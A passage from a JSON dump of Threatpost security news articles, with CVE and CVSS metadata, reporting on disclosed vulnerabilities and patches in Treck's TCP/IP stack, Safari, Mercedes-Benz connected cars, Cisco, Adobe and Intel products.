Denial of Service or a persistent Denial of Service, requiring a hard reset.\u201d\n\nThe critical bug tracked as CVE-2020-11897 meanwhile also carried a 10-out-of-10 severity, and is an out-of-bounds write flaw that can be triggered by sending multiple malformed IPv6 packets to a device. It affects any device running an older version of Treck with IPv6 support, and was previously fixed in a routine code change. It can potentially allow stable remote code execution, according to the writeup.\n\nAnother critical bug, CVE-2020-11901, ranks 9 out of 10 on the severity scale and can be triggered by answering a single DNS request made from the device. It can allow an attacker to infiltrate the network, execute code and take over the device with one vulnerability, bypassing any security measures.\n\n\u201cIt affects any device running Treck with DNS support and we have demonstrated that it can be used to perform remote code execution on a Schneider Electric APC UPS,\u201d according to JSOF. \u201cIn our opinion this is the most severe of the vulnerabilities despite having a CVSS score of 9, due to the fact that DNS requests may leave the network in which the device is located, and a sophisticated attacker may be able to use this vulnerability to take over a device from outside the network through DNS cache poisoning, or other methods.\u201d\n\nThe last critical bug is CVE-2020-11898, rating 9.1, which is an improper handling of length parameter inconsistency bug in the IPv4/ICMPv4 component, when handling a packet sent by an unauthorized network attacker. It can allow information disclosure.\n\nOther flaws range from high-severity 8.2 bugs (such as CVE-2020-11900, a use-after-free flaw) to low-severity improper input validation issues (such as CVE-2020-11913, rating only 3.7 in severity).\n\n\u201cThe other 15 vulnerabilities are in ranging degrees of severity with CVSS score ranging from 3.1 to 8.2, and effects ranging from denial of service to potential remote code execution,\u201d the firm said. \u201cMost of the vulnerabilities are true zero-days, with four of them having been closed over the years as part of routine code changes, but remained open in some of the affected devices (three lower severity, one higher). Many of the vulnerabilities have several variants due to the Stack configurability and code changes over the years.\u201d\n\nEffective exploitation can lead to a host of bad outcomes, the research firm warned, such as remote takeover of devices and lateral movement within the compromised network; broadcast attacks that can take over all impacted devices in the network simultaneously; hiding within an infected device for stealthy recon; and bypassing network address traversal (NAT) protections.\n\nJSOF will offer further details of the vulnerabilities [at the Black Hat USA virtual event](<https://threatpost.com/black-hat-usa-def-con-28-go-virtual/155606/>) in August.\n\nJonathan Knudsen, senior security strategist, Synopsys, noted that the Ripple20 disclosures illustrate endemic difficulties in software development.\n\n\u201cFirst, security must be integrated to every part of software development: From threat modeling during design to automated security testing during implementation, every phase of software development must involve security,\u201d he said via email. \u201cSecond, organizations that create software must manage their third-party components. The main reason for the far-reaching effects of the Ripple20 vulnerabilities is that they are vulnerabilities in a network component used by many organizations in many products. Each software development organization must understand the third-party components they are using to minimize the risk that they represent.\u201d\n\n## **Patches and Mitigation**\n\nTreck has issued a patch for use by OEMs in the latest Treck stack version (6.0.1.67 or higher). The challenge now is for those companies to implement it. In addition to advisories from ICS CERT, CERTCC and JPCERT/CC, [Intel](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00295.html>) and [HP](<https://support.hp.com/in-en/document/c06640149>) have also issued alerts.\n\n\u201cWhile the best response might be to install the original Treck patch, there are many situations in which installing the original patch is not possible,\u201d according to the JSOF analysis. \u201cCERTs work to develop alternative approaches that can be used to minimize or effectively eliminate the risk, even if patching is not an option.\u201d\n\nBecause it\u2019s a supply-chain issue, affected products should be able to update themselves, Knudsen added \u2013 something that\u2019s not always the norm in the IoT and industrial-control sectors.\n\n\u201cUsing secure development practices and managing third-party components will result in fewer, less frequent updates,\u201d he explained. \u201cNevertheless, something will always go wrong and updates will always be necessary. Systems and devices must be able to update themselves securely, and the manufacturer must make a commitment to maintaining the software for some clearly stated time period.\u201d\n\nBased on CERT/CC and CISA ICS-CERT advisories, if gear can\u2019t be patched, admins should minimize network exposure for embedded and critical devices, ensuring that devices are not accessible from the Internet unless absolutely essential. Also, operational technology networks and devices should be segregated behind firewalls and isolated from any business networks.\n\nUsers can also take steps to block anomalous IP traffic, employ pre-emptive traffic filtering, normalize DNS through a secure recursive server or DNS inspection firewall and/or provide DHCP/DHCPv6 security, with features such as DHCP snooping, according to the CERTs.\n\n\u201cThe software library spread far and wide, to the point that tracking it down has been a major challenge,\u201d the researchers concluded. \u201cAs we traced through the distribution trail of Treck\u2019s TCP/IP library, we discovered that over the past two decades this basic piece of networking software has been spreading around the world, through both direct and indirect use. As a dissemination vector, the complex supply chain provides the perfect channel, making it possible for the original vulnerability to infiltrate and camouflage itself almost endlessly.\u201d\n\n**_Insider threats are different in the work-from home era. On _**[**_June 24 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_, join the Threatpost edit team and our special guest, Gurucul CEO Saryu Nayyer, for a FREE webinar, \u201c_**_**The Enemy Within: How Insider Threats Are Changing.\u201d **_**_Get helpful, real-world information on how insider threats are changing with WFH, what the new attack vectors are and what companies can do about it_**_**. **_[**_Please register here_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_ for this Threatpost webinar._**\n", "cvss3": {}, "published": "2020-06-16T16:22:09", "type": "threatpost", "title": "'Ripple20' Bugs Impact Hundreds of Millions of Connected Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11896", "CVE-2020-11897", "CVE-2020-11898", "CVE-2020-11900", "CVE-2020-11901", "CVE-2020-11913", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-16T16:22:09", "id": "THREATPOST:659B01C0432DD93535B729D005CCA9E8", "href": "https://threatpost.com/millions-connected-devices-ripple20-bugs/156599/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:22:01", "description": "A security researcher has disclosed vulnerabilities in Apple\u2019s Safari browser that can be used to snoop on iPhones, iPads and Mac computers using their microphones and cameras. To exploit the flaws in a real-world attack, all an attacker would need to do is convince a victim to click one malicious link.\n\n[Security researcher Ryan Pickren](<https://www.ryanpickren.com>) has revealed details on seven flaws in Safari, including three that could be used in a kill chain to access victims\u2019 webcams. The vulnerabilities were previously submitted to Apple via its bug-bounty program and have been patched \u2013 however, technical details of the flaws, including a proof of concept (PoC) attack, were kept under wraps until Pickren\u2019s recent disclosure.\n\n\u201cImagine you are on a popular website when all of a sudden an ad banner hijacks your camera and microphone to spy on you. That is exactly what this vulnerability would have allowed,\u201d said Pickren, in an [analysis of the vulnerabilities last week](<https://www.ryanpickren.com/webcam-hacking-overview>). \u200b\u201dThis vulnerability allowed malicious websites to masquerade as trusted websites when viewed on the desktop version of Safari (like on Mac computers) or mobile Safari (like on iPhones or iPads).\u201d\n\n[](<https://threatpost.com/newsletter-sign/>) \nWhile normally each app must be explicitly granted permissions by users to access devices\u2019 cameras and microphones, Apple\u2019s own apps do not require them, including Safari. Furthermore, new web technologies, including the MediaDevices Web API (an interface providing access to connected media input devices like cameras and microphones, as well as screen sharing), allow certain websites to utilize Safari\u2019s permissions to access the camera directly. Pickren said that this feature is \u201cgreat for web-based video-conferencing apps such as Skype or Zoom. But\u2026 this new web-based camera tech undermines the OS\u2019s native-camera security model.\u201d\n\nWith these issues in mind, Pickren discovered three vulnerabilities in the macOS and iOS versions of Safari 13.0.4 ([CVE-2020-3885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3885>), [CVE-2020-3887](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3887>), [CVE-2020-9784](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9784>)), which eventually allowed him access to the webcam sans victim permission.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/06133731/finaldiagram.png>)\n\nClick to Enlarge: Diagram of the attack. Credit: Ryan Pickren\n\nSpecifically, the flaws stem from a perfect storm of small errors in how Safari parses Uniform Resource Identifiers (including URLs/web addresses); manages web origins (origins are defined by the protocol and web domain used) and ports; and initializes secure contexts (a secure context is a window where content has been delivered securely via HTTPS/TLS).\n\nAn attacker could take advantage of these errors by creating a specially crafted URL that would utilize scripts embedded in a malicious site. The URL would be able to trick Safari into thinking an attacker-controlled website is in the \u201csecure context\u201d of a trusted website, such as Zoom or Skype. Safari would then give the attackers behind the link untethered permission to access the webcam via the MediaDevices Web API.\n\n\u201cIf a malicious website strung these issues together, it could use JavaScript to directly access the victim\u2019s webcam without asking for permission,\u201d he said in a [technical walk through](<https://www.ryanpickren.com/webcam-hacking>) of the attack. \u201cAny JavaScript code with the ability to create a popup (such as a standalone website, embedded ad banner, or browser extension) could launch this attack.\u201d Once a user clicks on those website URLs, ad banners or extensions, the permissions to access their camera and microphone would be automatically granted to attackers.\n\nPickren said that he reported the seven flaws (CVE-2020-3852, CVE-2020-3864, CVE-2020-3865, CVE-2020-3885, CVE-2020-3887, CVE-2020-9784, and CVE-2020-9787) in December 2019 to Apple as part of their bug-bounty program (which was made [public to the research community](<https://threatpost.com/apples-bug-bounty-opens-1m-payout/151334/>) in December) \u2013 winning the researcher $75,000. [The top reward](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>) in the \u201cNetwork Attack without User Interaction: Zero-Click Unauthorized Access to Sensitive Data\u201d category, in which Pickren submitted his findings, is $500,000.\n\nApple patched the webcam vulnerabilities in a [January 28 update](<https://threatpost.com/apple-patches-ios-device-tracking/152364/>) (for Safari version 13.0.5) and the remaining four flaws were patched in [March](<https://support.apple.com/en-us/HT211102>). Threatpost has reached out to Apple for further comment.\n\nThe disclosure comes on the heels of a [separate report last week](<https://threatpost.com/two-zoom-zero-day-flaws-uncovered/154337/>) of two Zoom zero-day flaws in the macOS client version of the web conferencing platform. The Zoom vulnerabilities could give local, unprivileged attackers root privileges, and allow them to access victims\u2019 microphone and camera.\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-06T18:43:56", "type": "threatpost", "title": "Apple Safari Flaws Enable One-Click Webcam Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3852", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3885", "CVE-2020-3887", "CVE-2020-9784", "CVE-2020-9787"], "modified": "2020-04-06T18:43:56", "id": "THREATPOST:2334EE5F6C03FC3ECE377B9BD44BA4E7", "href": "https://threatpost.com/apple-safari-flaws-webcam-access/154476/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:15:38", "description": "The Mercedes-Benz E-Class went to market riddled with 19 vulnerabilities, which, among other things, could enable attackers to remotely unlock the car door and start its engine. Researchers say the flaws, detailed at Black Hat USA on Thursday, potentially impacted over 2 million Mercedes-Benz connected cars before they were fixed.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\n\nClick to register!\n\nThe E\u2013Class is a range of executive cars manufactured by the German automaker, with in-vehicle infotainment systems and various connectivity functionalities. Researchers with the Sky-Go car threat research team, which is part of the security company 360 Group, initially reported the flaws to Mercedes-Benz on Aug. 21 of last year, and an initial fix was deployed on Aug. 26. The researchers have now publicly disclosed the vulnerabilities.\n\n\u201cWe reported the flaws to Mercedez-Benz, we found about 19 vulnerabilities,\u201d said Minrui Yan, head of the Sky-Go Team with 360 Group, presenting with Jiahao Li, researcher with 360 Group, at Black Hat. \u201cThe key impact is that we can send a \u2018remote services\u2019 commands to the car. We did see many security considerations in the Mercedes-Benz.\u201d\n\n## **Connected Car Features **\n\nVarious security holes were discovered throughout the connectivity functionality architecture of the Mercedes-Benzes.\n\nThe first part of this architecture is the \u201cHead-Unit,\u201d or the infotainment system. Researchers specifically looked at the infotainment system in the Mercedes-Benz E300L model, code-named NTG-55 and designed by Mitsubishi Electronics. The system features multimedia functions and also connects to the \u201cMercedes Me\u201d mobile application. This app allows users to monitor their vehicles in detail, including remotely starting, or locking and unlocking, their vehicle \u2014 or even noting how much fuel is in the tank. Researchers found one flaw in the Head-Unit, which has not yet been assigned a CVE.\n\nMeanwhile, a critical communication intermediary between the external network and the in-vehicle network in the car is a Telematics Control Unit (TCU) called HERMES, which is short for Hardware for Enhanced Remote-, Mobility- &amp; Emergency Services. Its functionalities include the ability to make emergency calls and informational calls, and support for remote diagnosis, local diagnosis, and more. But, it also contains a communication module that supports 3G and 4G networks, and can be set up with a short-range wireless network (Wi-Fi or Bluetooth) for the infotainment system. Researchers found six of the 19 flaws in the HERMES component (including CVE-2019-19556, CVE-2019-19560, CVE-2019-19562, CVE-2019-19557, CVE-2019-19561 and CVE-2019-19563).\n\nOther flaws existed in the backend of the vehicle (nine flaws; eight of which had no CVE assigned and the ninth tied to CVE-2019-19558) and the operations system of the car (two flaws without CVEs assigned). Of note, in order to protect the intellectual property of Mercedes-Benz automaker Daimler, researchers disclosed limited security designs and code details.\n\n## **The Impact**\n\nIn order to send remote-services commands, researchers probed the HERMES TCU system of the car, which they say is the most crucial component in the whole system, since it features the communication module that connects the in-vehicle infotainment network and the external network and Mercedes Me app.\n\nIn order to further inspect HERMES, researchers needed physical access to the system since the firmware wasn\u2019t available on a vendor site or by proxying traffic. They physically opened the NAND flash storage containing the firmware using a ball-grid array (BGA) Rework Station with a socket that they made themselves.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/06152942/mercedes-benz.png>)\n\nResearchers then found that they were able to \u201ctamper with the file system by adding an interactive shell with root privileges. We found an engineer-mode program for debugging the TCU system, with access to the CAN bus via operating the MCU [a chip-level microcontroller],\u201d said researchers. \u201cThus, we can perform some operations for example, lock or unlock the doors.\u201d\n\nResearchers also found various other issues. For instance, TCU file systems stored the \u201cpkcs12\u201d client certificates, passwords and CA certificates for the car\u2019s back-end server \u2013 and researchers were able to sniff out the encrypted password files for certificates, which had a suffix \u201c.passwd.\u201d\n\n\u201cThe key of the certificate is encrypted to a file, so we can get the certificate key by compiling the decrypting tool with OpenSSL, obtaining the password of the certificate key. After decryption, the passwords of client certificate \u2026 can be obtained,\u201d they said.\n\nResearchers also found a server-side request forgery (SSRF) flaw on the back-end surface of the car\u2019s infotainment system, in a feature of the complementary web application that allows users to add their social-media accounts to the system: \u201cAn SSRF vulnerability occurred in the back-end service, as the image provider failed to filter the parameters we input,\u201d they explained. \u201cThe plugin developers have less consideration of the requested URL. For example, if we submit a local URL to the image provider, it\u2019ll return the contents we requested. \u201d\n\nAside from remote lock and start, the researchers have not been able to access any safety-critical functions of the vehicle, they said during their session. Guy Harpak, head of Product Security for Mercedes-Benz R&amp;D, said Mercedes-Benz took several incident response (IR) steps after learning of the vulnerabilities. These include selectively blocking services and providing immediate fixes; launching forensic investigations and deploying more long-term fixes.\n\n\u201cWe have an example here of a strong research community working with a strong industry can bring better security,\u201d Harpak said during the session.\n\nAs they become more connected, more and more vehicles are facing security holes. Previous researchers have discovered flaws in [car infotainment systems](<https://threatpost.com/connected-car-apps-open-privacy-hole-for-used-car-buyers/134549/>), as well as the wares of specific automakers like [Volkswagen](<https://threatpost.com/volkswagen-cars-open-to-remote-hacking-researchers-warn/131571/>), [Jeep](<https://threatpost.com/car-hacking-gets-the-attention-of-detroit-and-washington/113878/>) and more.\n\n[**_Check out Threatpost\u2019s live Black Hat USA 2020 coverage, including news interviews, threat research updates and more, here. _**](<https://threatpost.com/category/bh/>)\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-06T21:29:05", "type": "threatpost", "title": "Black Hat 2020: Mercedes-Benz E-Series Rife with 19 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19556", "CVE-2019-19557", "CVE-2019-19558", "CVE-2019-19560", "CVE-2019-19561", "CVE-2019-19562", "CVE-2019-19563", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-06T21:29:05", "id": "THREATPOST:50210848F5C0B6804DBF8A398FD41F24", "href": "https://threatpost.com/black-hat-19-flaws-connected-mercedes-benz-vehicles/158144/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:19:28", "description": "Cisco has hurried out a fix out for a critical remote code-execution flaw in its customer interaction management solution, Cisco Unified Contact Center Express (CCX).\n\nCisco\u2019s Unified CCX software is touted as a \u201ccontact center in a box\u201d that allows companies to deploy customer-care applications. The flaw (CVE-2020-3280), which has a CVSS score of 9.8 out of 10, stems from the Java Remote Management Interface of the product.\n\n\u201cThe vulnerability is due to insecure deserialization of user-supplied content by the affected software,\u201d according to Cisco, in a [Wednesday security alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-rce-GMSC6RKN>). \u201cAn attacker could exploit this vulnerability by sending a malicious serialized Java object to a specific listener on an affected system. A successful exploit could allow the attacker to execute arbitrary code as the root user on an affected device.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAn unauthenticated, remote attacker could exploit this flaw to execute arbitrary code on an affected device. Those who are using Cisco Unified CCX version 12.0 and earlier are urged to update to the fixed release, 12.0(1)ES03. Version 12.5 is not vulnerable, according to Cisco.\n\nCisco is not aware of any public announcements or malicious use of the flaw, according to the update. The tech giant on Wednesday also released a patch addressing [a high-severity flaw](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cpnr-dhcp-dos-BkEZfhLP>) (CVE-2020-3272) in its Prime Network Registrar, which enables dynamic host configuration protocol (DHCP) services (as well as DNS services).\n\nThe flaw stems from insufficient input validation of incoming DHCP traffic. It exists in the DHCP server and could enable an unauthenticated, remote attacker to trigger a denial of service (DoS) attack on an affected device.\n\n\u201cAn attacker could exploit this vulnerability by sending a crafted DHCP request to an affected device,\u201d according to Cisco. \u201cA successful exploit could allow the attacker to cause a restart of the DHCP server process, causing a DoS condition.\u201d\n\nAlso fixed were several medium-severity flaws, including a SQL injection flaw in Cisco\u2019s Prime Collaboration Provisioning Software (CVE-2020-3184), a DOS flaw in Cisco AMP for Endpoints Mac Connector Software (CVE-2020-3314) and memory buffer flaws (CVE-2020-3343, CVE-2020-3344) in Cisco AMP for Endpoints Linux Connector Software and Cisco AMP for Endpoints Mac Connector Software.\n\nEarlier this month, Cisco also stomped out [12 high-severity vulnerabilities](<https://threatpost.com/cisco-fixes-high-severity-flaws-in-firepower-security-software-asa/155568/>) affecting Cisco\u2019s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network-security devices. The flaws can be exploited by unauthenticated remote attackers to launch an array of attacks \u2013 from denial of service (DoS) to sniffing out sensitive data.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On [June 3 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>), join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, [Taming the Unmanaged and IoT Device Tsunami](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>). Get exclusive insights on how to manage this new and growing attack surface. [Please register here](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>) for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-21T15:44:30", "type": "threatpost", "title": "Critical Cisco Bug in Unified CCX Allows Remote Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3184", "CVE-2020-3272", "CVE-2020-3280", "CVE-2020-3314", "CVE-2020-3343", "CVE-2020-3344", "CVE-2020-5135"], "modified": "2020-05-21T15:44:30", "id": "THREATPOST:73F48A70A1B3DDD9B987BA26009E6630", "href": "https://threatpost.com/critical-cisco-rce-flaw-unified-ccx/155980/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:26:21", "description": "Adobe has released patches for five critical vulnerabilities in Adobe Illustrator CC, its popular vector graphics editor tool, which if exploited could enable arbitrary code execution.\n\nOverall Adobe patched nine vulnerabilities as part of its regularly-scheduled updates on Tuesday, including five critical ones in Adobe Illustrator CC, and four \u201cimportant\u201d and \u201cmoderate\u201d flaws in Adobe Experience Manager (AEM), its platform for integrated online marketing and web analytics.\n\n\u201cAdobe is not aware of any exploits in the wild for any of the issues addressed in these updates,\u201d according to[ Adobe\u2019s security update](<https://helpx.adobe.com/security/products/illustrator/apsb20-03.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe five critical flaws (CVE-2020-3710, CVE-2020-3711, CVE-2020-3712, CVE-2020-3713, CVE-2020-3714) open Illustrator CC up to a memory-corruption attack, which occurs when the contents of a memory location are modified due to programming errors, ultimately enabling attackers to execute arbitrary code.\n\nThe bugs affect Illustrator CC 2019 for Windows, versions 24.0 and earlier. Adobe users are urged to update to version 24.0.2, in a \u201cpriority 3\u201d update. According to Adobe, a \u201cpriority 3\u201d update \u201cresolves vulnerabilities in a product that has historically not been a target for attackers. Adobe recommends administrators install the update at their discretion.\u201d\n\nHonggang Ren with Fortinet\u2019s FortiGuard Labs was credited with discovering the flaws. Threatpost has reached out to Fortinet for further technical details.\n\nAdobe also stomped out three \u201cimportant\u201d vulnerabilities and one \u201cmoderate\u201d flaw in AEM. All four flaws could enable sensitive information disclosure. The important-severity flaws include two reflected cross-site scripting glitches (CVE-2019-16466 and CVE-2019-16467) that impact AEM 6.3, 6.4 and 6.5. These flaws enable an attacker to use a web app to send malicious code to a victim.\n\nThe other important-severity flaw is an expression language injection flaw (CVE-2019-16469) affecting AEM 6.5. Expression language injection occurs when attacker-controlled data is entered into an expression language interpreter.\n\nFinally, a moderate-severity user interface injection flaw (CVE-2019-16468) was also fixed, which impacts AEM 6.3, 6.4 and 6.5. The AEM flaws are a \u201cpriority 2\u201d update, meaning they exist in \u201ca product that has historically been at elevated risk.\u201d AEM users can update to the fixed versions, listed below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/14094457/Screen-Shot-2020-01-14-at-9.09.15-AM.png>)\n\nThis month\u2019s Adobe patches were few and far between, particularly [after last month\u2019s December update](<https://threatpost.com/adobe-fixes-critical-acrobat-photoshop-brackets-flaws/150970/>), when Adobe patched 25 CVEs overall across various products, including 17 critical vulnerabilities in Acrobat Reader, Photoshop and Brackets, which could lead to arbitrary code execution if exploited.\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._** [_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-14T15:42:13", "type": "threatpost", "title": "Adobe Patches Five Critical Illustrator CC Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16466", "CVE-2019-16467", "CVE-2019-16468", "CVE-2019-16469", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3710", "CVE-2020-3711", "CVE-2020-3712", "CVE-2020-3713", "CVE-2020-3714"], "modified": "2020-01-14T15:42:13", "id": "THREATPOST:3DD752D9BB64796659DC752DBB658DF2", "href": "https://threatpost.com/adobe-patches-critical-illustrator-cc-flaws/151812/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:29:14", "description": "A critical security bug in the Intel Converged Security and Manageability Engine (CSME) could allow escalation of privilege, denial of service or information disclosure.\n\nThe details are included in a [bug advisory](<https://blogs.intel.com/technology/2019/11/ipas-november-2019-intel-platform-update-ipu/#gs.fm1dlz>) that in total covers 77 vulnerabilities, 67 of which were found by internal Intel staff. The silicon giant has rolled out firmware updates and software patches to address these, which range in severity from the one critical flaw to a low-severity local privilege-escalation issue.\n\nThe affected products are: Intel CSME, Intel Server Platform Services (SPS), Intel Trusted Execution Engine (TXE), Intel Active Management Technology (AMT), Intel Platform Trust Technology (PTT) and Intel Dynamic Application Loader (DAL).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe critical flaw is a heap overflow bug with a score of 9.6 out of 10 on the CVSS v.3 severity scale (CVE-2019-0169). It exists in the subsystem in the Intel CSME, which is a standalone chip on Intel CPUs that is used for remote management. The vulnerability and could allow an unauthenticated user to enable escalation of privileges, information disclosure or denial of service via adjacent access.\n\n\u201cAdjacent access\u201d means that an attack must be launched from the same shared physical network or local IP subnet, or from within the same secure VPN or administrative network zone.\n\nAs for the other bugs, there\u2019s also a cross-site scripting (XSS) flaw rated as important (CVE-2019-11132). It exists in the subsystem of the Intel AMT and could allow a privileged user to enable privilege escalation via network access.\n\nIntel also fixed a slew of high-severity problems, including an insufficient access control issue (CVE-2019-11147) that could allow local privilege escalation by an authenticated user. It exists in the hardware abstraction driver for the MEInfo software for Intel CSME, TXEInfo software, and the INTEL-SA-00086 and INTEL-SA-00125 Detection Tools.\n\nOther high-severity bugs allow privilege escalation, including logic issues (CVE-2019-11105, CVE-2019-11131) in the subsystems for Intel CSME and Intel AMT; insufficient input validations (CVE-2019-11088, CVE-2019-11104) in the subsystem in Intel AMT, Intel TXE and the MEInfo software for Intel CSME; insufficient input validation for the firmware update software for Intel CSME (CVE-2019-11103); and improper directory permissions (CVE-2019-11097) in the installer for Intel Management Engine Consumer Driver for Windows and Intel TXE.\n\nRounding out the high-severity bugs is an insufficient input validation (CVE-2019-0131) in the subsystem in Intel AMT that could allow an unauthenticated user to carry out denial of service or information disclosure via adjacent access.\n\nIntel issued the update as part of its [monthly security-fix cadence](<https://threatpost.com/wp-admin/post.php?post=149034&action=edit>); it credited Daniel Moghimi and Berk Sunar from Worcester Polytechnic Institute, Thomas Eisenbarth from University of Lubeck, Nadia Heninger from University of California at San Diego, and Leon Nilges from n0xius and Jesse Michael from Eclypsium for uncovering 10 of the bugs.\n\n**_What are the top risks to modern enterprises in the peak era of data breaches? Find out: Join breach expert Chip Witt from SpyCloud and Threatpost senior editor Tara Seals, in our upcoming free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_, \u201cTrends in Fortune 1000 Breach Exposure.\u201d _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-11-12T19:07:34", "type": "threatpost", "title": "Intel Warns of Critical Info-Disclosure Bug in Security Engine", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0131", "CVE-2019-0169", "CVE-2019-11088", "CVE-2019-11097", "CVE-2019-11103", "CVE-2019-11104", "CVE-2019-11105", "CVE-2019-11131", "CVE-2019-11132", "CVE-2019-11147", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-11-12T19:07:34", "id": "THREATPOST:BBFD6EC28ECCF701431C5F4A518DC1B5", "href": "https://threatpost.com/intel-critical-info-disclosure-bug-security-engine/150124/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:02", "description": "Cisco is warning of several critical and high-severity flaws in its Data Center Network Manager (DCNM) for managing network platforms and switches.\n\nDCNM is a platform for managing Cisco data centers that run Cisco\u2019s NX-OS \u2014 the network operating system used by Cisco\u2019s Nexus-series Ethernet switches and MDS-series Fibre Channel storage area network switches. The flaws exist in the REST API of DCNM \u2014 and the most serious of these could allow an unauthenticated, remote attacker to bypass authentication, and ultimately execute arbitrary actions with administrative privileges on a vulnerable device.\n\nThe critical flaw (CVE-2020-3382), which was found during internal security testing, rates 9.8 out of 10 on the CVSS scale, making it critical in severity. While the flaw is serious, the Cisco Product Security Incident Response Team said it is not aware of any public announcements or malicious exploits of the vulnerability.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists because different installations share a static encryption key,\u201d said Cisco, [in a security update](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-bypass-dyEejUMs>) on Wednesday. \u201cAn attacker could exploit this vulnerability by using the static key to craft a valid session token. A successful exploit could allow the attacker to perform arbitrary actions through the REST API with administrative privileges.\u201d\n\nThis vulnerability affects all deployment modes of all Cisco DCNM appliances that were installed using .ova or .iso installers, and affects Cisco DCNM software releases 11.0(1), 11.1(1), 11.2(1), and 11.3(1).\n\n\u201cCisco has confirmed that this vulnerability does not affect Cisco DCNM instances that were installed on customer-provided operating systems using the DCNM installer for Windows or Linux,\u201d said Cisco. \u201cCisco has also confirmed that this vulnerability does not affect Cisco DCNM software releases 7.x and 